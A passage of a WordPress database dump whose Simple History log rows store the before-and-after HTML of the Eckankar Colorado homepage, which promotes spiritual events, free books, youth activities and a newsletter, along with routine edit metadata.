btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>');
INSERT INTO `wpcl_simple_history_contexts` VALUES (237011,40280,'_message_key','post_updated'),(237012,40280,'_user_id','2'),(237013,40280,'_user_login','S8zhaBda'),(237014,40280,'_user_email','nada@zipnadanot.org'),(237015,40280,'_server_remote_addr','76.130.120.x'),(237016,40280,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(237017,40281,'post_id','7160'),(237018,40281,'post_type','page'),(237019,40281,'post_title','Home'),(237010,40280,'post_new_post_content','<div style=\"height: 34%; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\" ><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #cccccc;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -274px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(237008,40280,'post_title','Home'),(237009,40280,'post_prev_post_content','<?xml version=\"1.0\" standalone=\"no\"?>\r\n<svg xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"wave\" 